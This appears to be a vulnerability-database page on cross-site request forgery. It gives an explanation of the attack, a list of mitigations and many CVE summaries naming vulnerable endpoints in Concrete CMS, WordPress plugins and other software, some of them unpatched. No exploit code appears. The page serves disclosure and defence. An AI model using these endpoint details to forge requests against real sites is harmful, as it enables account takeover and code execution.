Skip to main content

Cross-Site Request Forgery

web MEDIUM

Cross-Site Request Forgery exploits the automatic credential inclusion behavior of web browsers.

How It Works

Cross-Site Request Forgery exploits the automatic credential inclusion behavior of web browsers. When a user authenticates to a web application, the browser stores session cookies that are automatically attached to every subsequent request to that domain—regardless of which website initiated the request. An attacker leverages this by crafting a malicious webpage containing requests to a target application, such as hidden forms that auto-submit on page load or images with URLs triggering state-changing actions.

The attack succeeds when the victim, while authenticated to the target application, visits the attacker's page. The browser dutifully includes the victim's session cookies with the forged request, making it appear legitimate to the server. The target application executes the action as if the authenticated user intentionally initiated it.

Common attack vectors include hidden HTML forms with auto-submit JavaScript, malicious image tags where the src attribute points to an action URL, and links embedded in phishing emails. The key requirement is that request parameters must be predictable—if the attacker can construct the entire request without knowing any secret values, the attack will succeed.

Impact

  • Account takeover: Password or email address changes, locking out legitimate users
  • Financial fraud: Unauthorized fund transfers, purchases, or subscription modifications
  • Privilege escalation: Creation of admin accounts or modification of user roles
  • Data manipulation: Deletion of records, modification of settings, or content publishing
  • Social engineering amplification: Forced social media posts or message sending to spread malware

Real-World Examples

Banking applications have been frequent CSRF targets, with attackers creating malicious pages that automatically initiate wire transfers when visited by authenticated customers. One notable case involved a router configuration vulnerability where attackers embedded requests in forum posts to silently change DNS settings on victims' home routers, redirecting traffic through malicious servers.

YouTube suffered a CSRF vulnerability that allowed attackers to perform actions like adding videos to favorites or subscribing to channels on behalf of authenticated users by embedding malicious requests in external websites. The attack demonstrated how CSRF can manipulate social features at scale.

Content management systems have historically been vulnerable, with attacks forcing authenticated administrators to create new admin accounts or install malicious plugins simply by visiting attacker-controlled pages while logged into the CMS backend.

Mitigation

  • Synchronizer tokens: Generate unpredictable, per-session or per-request tokens that must accompany state-changing requests
  • SameSite cookie attribute: Set to Strict or Lax to prevent cookies from being sent with cross-origin requests
  • Double-submit cookies: Require a cookie value to match a request parameter, making cross-origin forgery impossible
  • Custom request headers: Use JavaScript to add headers that cross-origin requests cannot set
  • Re-authentication: Require password confirmation for sensitive actions like email or password changes
  • Referer validation: Verify the request originated from your domain (less reliable, can be bypassed)

Recent CVEs (8442)

EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-site request forgery in Concrete CMS 9.x before 9.5.0 permits a remote unauthenticated attacker to trigger unauthorized event duplication on behalf of an authenticated user by luring that user to an attacker-controlled page. The vulnerable endpoint is `concrete/controllers/dialog/event/duplicate`, which lacks CSRF token validation. The vendor-assigned CVSS v4.0 score of 2.3 reflects genuinely low impact - limited to a low-integrity effect on the vulnerable system - and no public exploit code or CISA KEV listing has been identified at the time of analysis.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery in Concrete CMS 9.x allows a remote unauthenticated attacker to trigger unauthorized reordering of Express Object associations by tricking an authenticated user into visiting a crafted page. The vulnerability targets the endpoint concrete/controllers/dialog/express/association/reorder, with impact limited to low-severity integrity modification of the vulnerable system only. No public exploit has been identified at time of analysis, and the low CVSS v4.0 score of 2.3 reflects the combination of required user interaction, specific prerequisite conditions (AT:P), and limited data impact.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery in Concrete CMS 9.x allows a remote unauthenticated attacker to forge state-changing requests against the file manager's addFavoriteFolder endpoint on behalf of an authenticated victim. Exploitation results in low-integrity impact - specifically unauthorized modification of a victim's favorite folder state - without any confidentiality or availability consequences. No public exploit has been identified at time of analysis, and the low CVSS v4.0 score of 2.3 reflects the passive user interaction requirement and constrained impact scope.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery in Concrete CMS 9.x (versions prior to 9.5.0) allows a remote attacker to trigger the removeFavoriteFolder action on behalf of an authenticated CMS user by tricking them into visiting a malicious page. The affected endpoint is concrete/controllers/backend/file and the impact is limited to low-integrity modification - removal of a favorite folder. No public exploit has been identified and this vulnerability is not confirmed as actively exploited (CISA KEV). The CVSS 4.0 score of 2.3 accurately reflects the constrained, low-impact nature of the flaw.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery (CSRF) in Concrete CMS 9.x before 9.5.1 allows a remote unauthenticated attacker to trigger unauthorized file-starring actions on behalf of an authenticated victim by luring them to a malicious page. The vulnerable endpoint is concrete/controllers/backend/file/star(), and successful exploitation results in a low-integrity modification of file bookmark state within the CMS. No public exploit code has been identified at time of analysis, and the Concrete CMS security team assigned this a CVSS v4.0 score of 2.3, reflecting its narrow, low-impact scope.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

CSRF vulnerability in Concrete CMS 9.x exposes the backend file rescan controller at concrete/controllers/backend/file to unauthorized state-changing requests. Affecting versions 9.0 through 9.4.x (patched in 9.5.1), an unauthenticated remote attacker can trigger unintended file rescan operations against an authenticated victim's session by luring them to a malicious page. Rated CVSS v4.0 at 2.3 - limited to low integrity impact with no confidentiality or availability consequence - and no public exploit identified at time of analysis.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery (CSRF) in Concrete CMS 9.x through 9.5.0 allows a remote unauthenticated attacker to trigger unauthorized file rescanning via the rescanMultiple() function in the backend file controller, provided a logged-in user can be lured to interact with an attacker-crafted page. The integrity impact is limited to the vulnerable component, with no confidentiality or availability consequence. No public exploit or active exploitation has been identified; the Concrete CMS security team assigned a CVSS v4.0 score of 2.3, reflecting the low real-world impact and the prerequisite of user interaction and specific attack conditions.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Cross-Site Request Forgery in Concrete CMS versions 9.0 through 9.5.0 exposes the approveVersion() backend file management endpoint to forged requests, allowing an unauthenticated remote attacker to manipulate file version approval state on behalf of an authenticated victim. The vendor's own CVSS v4.0 scoring assigns a 2.3 (Very Low) severity, reflecting the constrained impact - limited to low integrity change within the vulnerable component with no confidentiality or availability consequence. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, positioning this as a low-priority but legitimately tracked integrity weakness in CMS file workflows.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Unauthorized file deletion is possible in Concrete CMS 9.5.0 and below due to an inverted CSRF token validation logic in the DeleteFile controller, where the protection mechanism operates in reverse - rejecting legitimate requests and approving forged ones. A remote unauthenticated attacker (PR:N per CVSS v4.0) can craft a cross-site request forgery attack that deletes files on behalf of any victim authenticated with conversation message editing privileges. No public exploit has been identified at time of analysis, and this CVE is not listed in CISA KEV; the vendor-assigned CVSS v4.0 score of 2.3 reflects the constrained real-world impact given the required victim privilege level and mandatory user interaction.

CSRF Concrete Cms
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator's browser into triggering a core CMS upgrade to an attacker-chosen version. The dashboard's do_update() controller emits a CSRF token in the rendered POST form but never calls $this->token->validate('do_update'), leaving the update workflow effectively unauthenticated against forged cross-origin requests. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

PHP CSRF
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote code execution in Concrete CMS 9.5.0 and earlier is achievable through a CSRF flaw in the /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID> endpoint, which fails to validate anti-CSRF tokens. An attacker who controls a marketplace package matching an item ID already installed on the victim site can overwrite package PHP files and trigger the upgrade() method via a single navigation by a privileged admin, resulting in code execution as the web server user. No public exploit identified at time of analysis, though the vendor (Concrete CMS security team) has acknowledged and rated the issue at CVSS 4.0 7.5.

PHP CSRF RCE
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator with canInstallPackages permission into installing an attacker-controlled package, resulting in remote code execution as the web server user. The flaw resides in the install_package() method of the dashboard's extend/install.php controller, which lacks CSRF token validation. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

PHP CSRF RCE
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce authenticated administrators into downloading arbitrary marketplace packages to the server's DIR_PACKAGES directory by luring them to a crafted page that triggers the unprotected /dashboard/extend/install/download/<remoteId> GET endpoint. The vendor assigned CVSS 4.0 of 7.5 reflecting high impact on confidentiality, integrity, and availability, though no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.

PHP CSRF
NVD
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

NocoDB's refresh-token cookie in versions up to and including 0.301.3 was misconfigured in `setTokenCookie` - issued with only `httpOnly: true` and no `secure` or `sameSite` attributes - exposing two distinct attack paths: cookie interception over plain HTTP networks and CSRF against the `POST /api/v2/auth/token/refresh` endpoint, which returns a new JWT without validating any CSRF token. Because refresh tokens carry multi-day expiry windows via `NC_REFRESH_TOKEN_EXP_IN_DAYS`, successful exploitation yields a long-lived credential for follow-on account access. No public exploit has been identified at time of analysis and no released patched version is confirmed, despite a documented fix in the GitHub advisory GHSA-f74w-272x-mqcv.

CSRF XSS
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator into triggering arbitrary package upgrades by luring them to a malicious page that issues a single GET to /dashboard/extend/update/do_update/<pkgHandle>. The do_update() handler only checks the canInstallPackages() permission and omits CSRF token validation on this state-changing route, so a cross-site navigation is sufficient to invoke upgradeCoreData() and the package controller's upgrade() routine. No public exploit identified at time of analysis and no CISA KEV listing; EPSS not provided.

PHP CSRF
NVD VulDB
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Stored/reflected cross-site scripting in the md-fileserver npm package (versions prior to 1.10.3) allows remote unauthenticated attackers to execute arbitrary JavaScript in a viewer's browser by uploading or supplying Markdown files containing raw HTML or script tags. The vulnerability stems from markdown-it being configured with html:true and rendered output being injected into the template without sanitization or output encoding. No public exploit identified at time of analysis beyond the vendor-provided PoC, and the issue is not currently listed in CISA KEV.

Information Disclosure CSRF XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM This Month

SSO authentication callback origin validation failure in Mattermost Mobile Apps enables cross-server credential theft across multiple release branches (≤11.1.3, ≤11.3.2, ≤11.0.4, ≤10.11.11, ≤2.0.37). An attacker operating a malicious Mattermost server can relay the SSO authorization code exchange through a victim's mobile application to authenticate against a separate, legitimate Mattermost server - stealing valid session credentials without the victim's awareness. No public exploit has been identified at time of analysis, and CVSS AC:H constrains this to targeted, engineered attacks rather than opportunistic mass exploitation.

Microsoft CSRF Mattermost
NVD VulDB
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Authentication bypass in Trilium Notes Desktop (Electron build) versions 0.102.1 and earlier allows remote unauthenticated attackers on the same network to access the Clipper API and read or manipulate notes without any credentials. The Electron runtime detection explicitly disables auth middleware on endpoints like /api/clipper/notes and the handshake endpoint, which fingerprints the application - no public exploit identified at time of analysis, but the vendor advisory GHSA-jcvx-vc83-cppw confirms the issue and the fix shipped in 0.102.2.

CSRF Authentication Bypass Trilium
NVD GitHub
EPSS 0% CVSS 8.0
HIGH This Week

Cross-site request forgery in Sitemio Information Technologies' WISECP product through version 20022026 allows attackers to trick authenticated users into performing unintended state-changing actions by visiting a malicious page. Successful exploitation carries high impact across confidentiality, integrity, and availability (CVSS 8.0), though it requires user interaction and the victim to hold valid low-privilege credentials. No public exploit identified at time of analysis, and the vendor did not respond to disclosure outreach by TR-CERT.

CSRF Wisecp
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Stored Cross-Site Scripting via CSRF in the Anomify AI WordPress plugin (versions ≤ 0.3.6) allows unauthenticated remote attackers to inject persistent JavaScript into the WordPress admin panel by tricking a logged-in administrator into visiting an attacker-controlled page. The attack chains two flaws: a missing nonce check on the settings handler (no check_admin_referer()) that permits any cross-origin POST to modify plugin settings, and a double-quote escape bypass where the API key value is stored after sanitize_text_field() sanitization but rendered into an HTML attribute via bare echo without esc_attr(), allowing the payload to survive both sanitization and storage. No public exploit has been identified at time of analysis, and the CVE is not listed in the CISA KEV catalog.

WordPress PHP CSRF +1
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Request Forgery chained to Stored Cross-Site Scripting in the Word 2 Cash WordPress plugin (versions ≤ 0.9.2) allows unauthenticated remote attackers to plant persistent JavaScript payloads inside the WordPress admin panel. The attack succeeds because the plugin's settings handler (w2c_admin()) performs no nonce verification, no input sanitization before storage, and no output escaping on retrieval - meaning a forged POST from any attacker-controlled page is indistinguishable from a legitimate admin save. No public exploit or CISA KEV listing has been identified at time of analysis, but the CVSS score of 6.1 with Changed scope reflects real post-exploitation reach within the admin context once triggered.

WordPress CSRF XSS
NVD VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Child Height Predictor by Ostheimer WordPress plugin (all versions through 1.3) allows unauthenticated remote attackers to modify plugin settings by tricking an authenticated administrator into visiting a malicious page. The vulnerability stems from a complete absence of nonce verification in the options() function - neither wp_nonce_field() in the form template nor check_admin_referer()/wp_verify_nonce() in the handler - meaning any forged POST request from an admin session will be accepted and persisted to the database. No public exploit has been identified at time of analysis, and CVSS scores this as medium severity (4.3), which aligns with the limited integrity impact (settings modification only, no confidentiality or availability loss).

WordPress CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Bottom Bar WordPress plugin (all versions up to and including 0.1.7) allows unauthenticated attackers to modify plugin configuration by tricking a logged-in administrator into visiting a malicious page. All three administrative settings forms - main settings, sharing services, and restore defaults - lack both wp_nonce_field() output and server-side check_admin_referer() validation in bottom-bar-admin.php, meaning any POST to those endpoints is processed without request authenticity checks. No public exploit has been identified at time of analysis, no patched version has been confirmed, and the vulnerability is not listed in CISA KEV.

WordPress PHP CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Amazon Scraper WordPress plugin (submone, all versions through 1.1) allows unauthenticated remote attackers to modify plugin settings and inject persistent malicious scripts by tricking an authenticated site administrator into clicking a crafted link. The root cause is missing or incorrect nonce validation across multiple functions in amazon-admin.php (identified at lines 13, 26, 45, and 49). No public exploit has been identified at time of analysis, and the plugin has not been added to the CISA KEV catalog, but the Wordfence-reported disclosure includes direct source code references making exploitation straightforward for a motivated attacker.

WordPress CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Settings-reset CSRF in the Remove Yellow BGBOX WordPress plugin (all versions up to and including 1.0) allows unauthenticated remote attackers to overwrite the plugin's stored configuration by tricking a logged-in site administrator into loading a forged request. The vulnerability stems from absent nonce validation on the rybb_api_settings page, confirmed by Wordfence with direct source code references to admin/rybb_api_settings.php and includes/functions.php. No public exploit code or CISA KEV listing has been identified at time of analysis, and the limited integrity impact keeps real-world priority low.

WordPress CSRF
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Request Forgery in the Sentence To SEO WordPress plugin (all versions up to and including 1.0) allows unauthenticated remote attackers to inject persistent malicious scripts and overwrite plugin settings by forging admin form submissions against the unprotected create_admin_page() function. Because the CVSS vector carries Changed scope (S:C), a successfully forged request can achieve Stored XSS within the WordPress admin context, crossing the boundary from the plugin into the administrator's browser session. No public exploit code or active exploitation has been identified at time of analysis, and no KEV listing exists, but the attack class is well-understood and exploitation templates for WordPress CSRF-to-XSS chains are widely available.

WordPress CSRF
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Cross-Site Request Forgery in the BLOGCHAT Chat System WordPress plugin (all versions through 1.3.6.3) enables unauthenticated remote attackers to both update plugin settings and inject persistent malicious web scripts by tricking an authenticated site administrator into clicking a crafted link. The vulnerability stems from missing or incorrect nonce validation across multiple functions in wp-blogchat-widget.php (lines 208, 215, 222, 293), making it a compound CSRF+Stored XSS risk with Changed scope (S:C) in the CVSS rating. No public exploit code or CISA KEV listing has been identified at time of analysis.

WordPress CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Authorization bypass in the TypeSquare Webfonts for ConoHa WordPress plugin (all versions through 2.0.4) allows authenticated attackers with subscriber-level access to arbitrarily modify site-wide font configuration by submitting a POST request to any wp-admin page. The plugin fails to verify that the requesting user has permission to alter settings such as typesquare_auth (fontThemeUseType), show_post_form, and typesquare_fonttheme (CWE-862). Compounding the issue, when fontThemeUseType values 1 or 3 are targeted, nonce verification is also absent, making those specific code branches additionally exploitable via cross-site request forgery against higher-privileged users. No public exploit has been identified at time of analysis, and no confirmed patched version has been released.

WordPress CSRF Authentication Bypass
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the JaviBola Custom Theme Test WordPress plugin (all versions through 2.0.5) enables unauthenticated remote attackers to silently replace the site's active theme by forging a request that modifies the `jbct_theme` option. Exploitation requires social-engineering a logged-in site administrator into clicking a crafted link - the CVSS UI:R requirement reflects this dependency. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog.

WordPress CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Bigfishgames Syndicate WordPress plugin (all versions through 1.2) enables unauthenticated remote attackers to reset and overwrite plugin settings by forging admin-panel requests. The vulnerability resides in the bigfishgames_syndicate_submenu() function, which lacks proper WordPress nonce validation, meaning any crafted HTTP request bearing a valid admin session will be accepted as legitimate. Exploitation requires tricking an authenticated site administrator into triggering the forged request; no public exploit has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog.

WordPress CSRF
NVD
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-Site Request Forgery in the Games Catalog WordPress plugin (versions ≤ 1.2.0) enables unauthenticated attackers to delete arbitrary game catalog entries and their associated WordPress posts by tricking a logged-in site administrator into clicking a crafted link. The vulnerable gc_crud() function in admin-crud.php processes the action=delete parameter via a GET request with no wp_verify_nonce() or check_admin_referer() call, bypassing WordPress's standard CSRF defenses entirely. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the attack surface is fully visible in the public WordPress plugin Trac repository, making it trivially constructible.

WordPress CSRF
NVD
EPSS 0% CVSS 8.8
HIGH This Week

Cross-Site Request Forgery in InfoScale 9.1.3 Operations Manager (VIOM) web application allows remote attackers on the adjacent network to coerce an authenticated user with an active session into clicking a malicious link that triggers unintended state-changing actions in VIOM. No public exploit identified at time of analysis, but the CVSS 8.8 score reflects high impact on confidentiality, integrity, and availability if a privileged VIOM operator is targeted.

CSRF
NVD VulDB
EPSS 3% CVSS 8.5
HIGH POC PATCH This Week

Server-side request forgery in SillyTavern 1.17.0 allows authenticated low-privilege users to coerce the server into making arbitrary HTTP requests against internal or loopback addresses via the /api/search/searxng endpoint's unvalidated baseUrl parameter, returning response bodies to the attacker. The flaw was addressed in 1.18.0, which introduced an opt-in Private Request Whitelisting filter (disabled by default). Publicly available exploit code exists in the GitHub Security Advisory GHSA-qg89-qwwh-5f3j, but no public exploit identified at time of analysis as actively exploited.

CSRF SSRF
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH Act Now

In ScadaBR version 1.2.0, a CSRF vulnerability could allow an attacker to trigger any authenticated action through a victim's session by luring any logged-in user to a malicious webpage.

CSRF Scadabr
NVD
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Stored cross-site scripting in Budibase self-hosted deployments (versions before 3.38.2) allows any authenticated user with Builder role - or any BASIC/POWER user with table WRITE permission - to upload SVG, HTML, or JavaScript files containing active content via the /api/attachments/process and /api/attachments/:tableId/upload endpoints. The files are stored in the configured object store (MinIO/S3) with their executable MIME types and served via signed URLs, so any end user viewing an attachment triggers script execution in their browser session. Publicly available exploit code exists (detailed PoC in the GHSA advisory); no public exploit identified in active campaigns at time of analysis.

Docker Redis CSRF +2
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Server-Side Request Forgery in HAXcms (versions <= 25.0.0 of @haxtheweb/haxcms-nodejs, with PoC against v11.0.6) allows authenticated low-privileged users to coerce the server into fetching arbitrary URLs or local file paths via the createSite endpoint's build.files parameter, with responses written to a web-accessible directory. This produces arbitrary file read, internal network reconnaissance, and cloud metadata credential theft. Publicly available exploit code exists in the GHSA advisory, though no CISA KEV listing is present.

PHP CSRF SSRF
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Session fixation in Keycloak's login-actions endpoints allows remote attackers to hijack authenticated sessions and take over accounts, including highly privileged administrative ones. Exploitation requires the victim to click an attacker-crafted link, after which an existing SSO session causes transparent authentication into the attacker-controlled flow. No public exploit identified at time of analysis, but Red Hat has confirmed the flaw in Red Hat Build of Keycloak.

CSRF Authentication Bypass Red Hat Build Of Keycloak
NVD VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Unauthenticated broadcast hijack in TinyIce versions 0.8.95 through 2.4.1 allows any network attacker reaching the HTTP port to inject arbitrary audio/video streams onto any mount via the WebRTC source-ingest endpoint. The POST /webrtc/source-offer handler omitted the source-password check that all other ingest paths (Icecast SOURCE/PUT, RTMP, SRT) enforce, letting attackers replace legitimate broadcasts with their own content. Publicly available exploit code exists in the form of a one-line curl probe published in the GHSA advisory, though no public exploit identified for sustained hijack at time of analysis.

Authentication Bypass CSRF
NVD GitHub
EPSS 0% CVSS 7.4
HIGH PATCH This Week

Sensitive cookie disclosure in async-http-client (AHC) Java library allows remote attackers to harvest session cookies, CSRF tokens, and API keys by inducing an HTTP redirect across an origin or scheme-downgrade boundary. The Redirect30xInterceptor correctly strips Authorization and Proxy-Authorization headers when crossing security boundaries but fails to strip the Cookie header, leaking it to the redirect target. A proof-of-concept is published in the GHSA advisory; no public exploit identified at time of analysis in the wild and the issue is not in CISA KEV.

Java Information Disclosure CSRF
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH POC This Week

Server-side request forgery in Dozzle (amir20/dozzle) versions through 8.14.12 allows remote unauthenticated attackers to coerce the Dozzle host into issuing arbitrary HTTP POST requests and reflects up to 1MB of the response body back. The flaw lives in POST /api/notifications/test-webhook, which is exposed without authentication in the documented default Docker quickstart deploy (DOZZLE_AUTH_PROVIDER unset). No public exploit identified at time of analysis, but a detailed proof-of-concept accompanies the GHSA advisory.

SSRF Docker CSRF
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting in the CI4MS (CodeIgniter 4 CMS/ERP) Pages module versions <= 0.31.8.0 allows authenticated content authors holding the pages.create or pages.update permission to persist arbitrary JavaScript that executes in every visitor's browser when the public Pages renderer outputs the field unescaped. Publicly available exploit code exists in the GitHub Security Advisory (GHSA-gqr2-7hcg-rchf), and because vulnerable pages can be promoted to the site home page, a single injection escalates from a low-privileged author to full administrator session takeover when an admin browses the front-end.

Privilege Escalation PHP RCE +2
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Destructive file operations in the CI4MS Fileeditor module (composer/ci4-cms-erp/ci4ms ≤ v0.31.8.0) allow an authenticated backend user to delete or rename arbitrary framework files - including the front controller, routing config, and authentication filter pipeline - producing a persistent denial of service that requires filesystem-level redeployment to recover. The root cause is an inconsistent application of the existing extension allowlist: while saveFile and createFile correctly gate writes through allowedFileTypes(), the deleteFileOrFolder and renameFile endpoints apply no such check to the source path, meaning any file inside ROOTPATH not named in the narrow $hiddenItems blocklist is reachable. A working curl-based proof-of-concept is publicly available via GitHub advisory GHSA-245j-xjvr-xvm5; no CISA KEV listing is present at time of analysis.

PHP CSRF Denial Of Service
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in CI4MS (composer package ci4-cms-erp/ci4ms, versions up to 0.31.8.0) allows authenticated content editors holding the `blogs.create` or `blogs.update` role to persist arbitrary JavaScript that executes in every visitor's browser, including superadmins who review or preview posts. The root cause is a PHP by-reference mutation in the `html_purify` custom validation rule that CodeIgniter 4's validator silently discards - raw POST data bypasses sanitization entirely and is written unescaped to the database and rendered directly in the public template. A detailed public proof-of-concept exploit exists; vendor-released patch 0.31.9.0 was published on 2026-05-08 and is confirmed to address the issue.

PHP CSRF XSS
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Zechat 1.5 contains a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to change a user's information by bypassing anti-CSRF protections. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Zechat
NVD Exploit-DB VulDB
EPSS 0% CVSS 5.3
MEDIUM POC This Month

Joomla JoomOCShop 1.0 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized actions on behalf of authenticated users. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Joomla Extension Joomocshop
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Joomla jCart for OpenCart 2.3.0.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information without authentication. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Joomla Extension Jcart For Opencart
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

Joomla!. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Js Jobs
NVD Exploit-DB VulDB
EPSS 0% CVSS 5.3
MEDIUM POC This Month

TP-Link TL-WR720N wireless router contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized administrative actions by crafting malicious web requests. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

CSRF TP-Link
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

bloofoxCMS 0.5.2.1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions by tricking logged-in users into visiting malicious pages. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

CSRF Bloofoxcms
NVD Exploit-DB GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM POC This Month

Quick.CMS 6.7 contains a cross-site scripting vulnerability in the sliders form that allows authenticated attackers to inject malicious scripts by submitting XSS payloads through the sDescription. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS PHP CSRF
NVD Exploit-DB VulDB
EPSS 0% CVSS 8.7
HIGH POC This Week

TextPattern CMS 4.9.0-dev contains a remote code execution vulnerability that allows authenticated attackers to upload arbitrary PHP files by exploiting the plugin upload functionality. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

RCE CSRF PHP
NVD Exploit-DB GitHub VulDB
EPSS 0% CVSS 6.9
MEDIUM POC This Month

MyBB Timeline Plugin 1.0 contains cross-site scripting vulnerabilities that allow attackers to inject malicious scripts through thread titles, post content, and user profile fields like Location and. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS PHP CSRF
NVD Exploit-DB
EPSS 0% CVSS 5.7
MEDIUM This Month

Cross-site request forgery in AVideo's LoginControl plugin allows remote attackers to disable two-factor authentication for authenticated victims through a single malicious HTTP request. The vulnerability exists in plugin/LoginControl/set.json.php which accepts POST requests to toggle 2FA without CSRF token validation, origin verification, or re-authentication. Attackers deliver a weaponized webpage containing a hidden form that auto-submits to the vulnerable endpoint; when a logged-in AVideo administrator visits this page, their 2FA protection is silently stripped, enabling subsequent credential-based account takeover. The flaw is confirmed through GitHub security advisory GHSA-3mv2-vmwh-rwfx with source code evidence showing the endpoint performs only session authentication (User::isLogged()) while omitting the forbidIfIsUntrustedRequest() protection used throughout the rest of the codebase. No public exploit code identified at time of analysis, though the attack is trivial to weaponize given the detailed advisory.

Authentication Bypass Open Redirect CSRF +2
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting in AVideo's Live plugin allows authenticated streamers to inject malicious JavaScript into live stream pages, executing in any visitor's browser context. The vulnerability exists in modeYoutubeLive.php where stream keys are rendered unescaped into HTML class attributes. Attackers with canStream privileges can persist event handlers via crafted stream keys that trigger when victims view the live page, enabling session hijacking, CSRF token theft, and potential admin account compromise. CVSS 5.4 reflects network-accessible exploitation requiring only low-privilege authentication and user interaction, with scope change indicating cross-user impact. No patch is currently available per GitHub advisory GHSA-m5j4-7r85-2cj2.

Mozilla CSRF XSS +1
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM POC PATCH This Month

CSRF vulnerability in Turborepo's self-hosted authentication flow allows credential injection attacks when users authenticate the CLI against self-hosted remote cache endpoints. An attacker-controlled web page can send a malicious token to the localhost callback server during the login process. If the malicious callback arrives before the legitimate OAuth response, the CLI completes authentication with attacker-supplied credentials, leading to high integrity impact on subsequent build operations. This affects users of self-hosted Turborepo deployments only - Vercel's hosted device authorization flows are not vulnerable. Fixed in version 2.9.14.

CSRF Turborepo Vercel
NVD GitHub VulDB
EPSS 0% CVSS 4.3
MEDIUM This Month

The Notify Odoo WordPress plugin up to version 1.0.1 contains a Cross-Site Request Forgery (CSRF) vulnerability in the _updateSettings function that allows unauthenticated attackers to modify critical plugin configuration-including the Notify Odoo URL, notification settings, tracking image configuration, and allowed IP addresses-by tricking site administrators into clicking a malicious link. The vulnerability requires user interaction (administrator action) but poses a direct integrity risk by enabling attackers to redirect plugin functionality to attacker-controlled servers or disable legitimate notification and tracking features.

CSRF WordPress
